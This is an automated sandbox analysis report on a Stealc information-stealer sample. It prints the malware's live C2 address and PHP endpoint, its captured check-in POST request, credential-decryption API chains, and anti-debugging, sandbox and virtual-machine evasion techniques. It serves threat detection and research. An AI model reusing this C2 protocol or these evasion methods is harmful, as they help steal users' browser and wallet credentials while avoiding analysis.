Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523401
MD5:2b6a17cf5d76f7664806991d7619e998
SHA1:b32948270dcb41941e0f98122f9c9d48a36c199c
SHA256:beb033b6b81e60ed419ba19985a2c7d1ffb6a4bcadf151e4686404079e0c7747
Tags:exeStealcuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2B6A17CF5D76F7664806991D7619E998)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1656JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1656JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.230000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T15:22:01.059735+020020442431Malware Command and Control Activity Detected192.168.2.649710185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.230000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0023C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00237240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00237240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00239AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00239AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00239B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00239B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00248EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00244910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0023DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0023E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0023ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00244570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0023DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0023BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00243EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00243EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0023F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002316D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 34 30 39 33 45 31 32 38 35 41 31 33 36 31 34 39 35 32 39 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="hwid"774093E1285A1361495298------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="build"doma------AFBAFBKEGCFBGCBFIDAK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00234880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00234880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 34 30 39 33 45 31 32 38 35 41 31 33 36 31 34 39 35 32 39 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="hwid"774093E1285A1361495298------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="build"doma------AFBAFBKEGCFBGCBFIDAK--
                Source: file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.0000000001072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/:y
                Source: file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/am
                Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&c
                Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpEy
                Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
                Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpvca
                Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpzcu
                Source: file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37GD7

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006098480_2_00609848
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006139650_2_00613965
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060C1470_2_0060C147
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B09960_2_006B0996
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006102560_2_00610256
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00606ABA0_2_00606ABA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00607BEF0_2_00607BEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00683BC10_2_00683BC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4C080_2_006A4C08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005204390_2_00520439
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00611D7D0_2_00611D7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060CDC90_2_0060CDC9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00502D920_2_00502D92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00718E170_2_00718E17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060E7810_2_0060E781
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 002345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: rjfivtba ZLIB complexity 0.9950053175326649
                Source: file.exe, 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00249600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00243720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00243720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\5K8V7ISB.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1841152 > 1048576
                Source: file.exeStatic PE information: Raw size of rjfivtba is bigger than: 0x100000 < 0x19b600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.230000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rjfivtba:EW;iwmizbgs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rjfivtba:EW;iwmizbgs:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00249860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d1064 should be: 0x1c48d2
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: rjfivtba
                Source: file.exeStatic PE information: section name: iwmizbgs
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024B035 push ecx; ret 0_2_0024B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ebp; mov dword ptr [esp], esi0_2_00609873
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 5B27CC5Eh; mov dword ptr [esp], edi0_2_006098F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 4BAEE901h; mov dword ptr [esp], edx0_2_00609988
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push edi; mov dword ptr [esp], edx0_2_006099A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 578D5248h; mov dword ptr [esp], eax0_2_00609A2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push esi; mov dword ptr [esp], edx0_2_00609A4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ecx; mov dword ptr [esp], eax0_2_00609A52
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push esi; mov dword ptr [esp], 4A645633h0_2_00609AE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ebx; mov dword ptr [esp], 7CF9B125h0_2_00609B29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ecx; mov dword ptr [esp], esi0_2_00609B76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 1BD5D112h; mov dword ptr [esp], ebx0_2_00609BA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 75129058h; mov dword ptr [esp], ebx0_2_00609C30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push edx; mov dword ptr [esp], esp0_2_00609D13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 3CB9A89Ch; mov dword ptr [esp], eax0_2_00609E90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 5C84ED41h; mov dword ptr [esp], esi0_2_00609ED9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push edx; mov dword ptr [esp], ecx0_2_00609F1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push eax; mov dword ptr [esp], ebp0_2_00609F1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 32403C7Ah; mov dword ptr [esp], ecx0_2_00609F9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 0D8CF9D5h; mov dword ptr [esp], edx0_2_0060A000
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ebp; mov dword ptr [esp], ecx0_2_0060A03C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push eax; mov dword ptr [esp], ecx0_2_0060A0C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push edi; mov dword ptr [esp], edx0_2_0060A165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push eax; mov dword ptr [esp], ecx0_2_0060A202
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 1532E82Dh; mov dword ptr [esp], esi0_2_0060A22F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ebx; mov dword ptr [esp], eax0_2_0060A235
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 7FA0CC2Fh; mov dword ptr [esp], ecx0_2_0060A285
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 7D26C661h; mov dword ptr [esp], ebp0_2_0060A292
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push 339F1360h; mov dword ptr [esp], eax0_2_0060A360
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push ebp; mov dword ptr [esp], 2CC1B631h0_2_0060A3D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609848 push edx; mov dword ptr [esp], eax0_2_0060A42E
                Source: file.exeStatic PE information: section name: rjfivtba entropy: 7.953820033334295

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00249860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13652
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187B0 second address: 6187BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F91A0D1A3DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6187BE second address: 6187C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6177C4 second address: 6177CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6177CA second address: 6177D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F91A12E52FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617C0D second address: 617C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617C11 second address: 617C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F91A12E52F8h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F91A12E5304h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617EC6 second address: 617ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617ECA second address: 617EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5305h 0x00000007 ja 00007F91A12E52F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
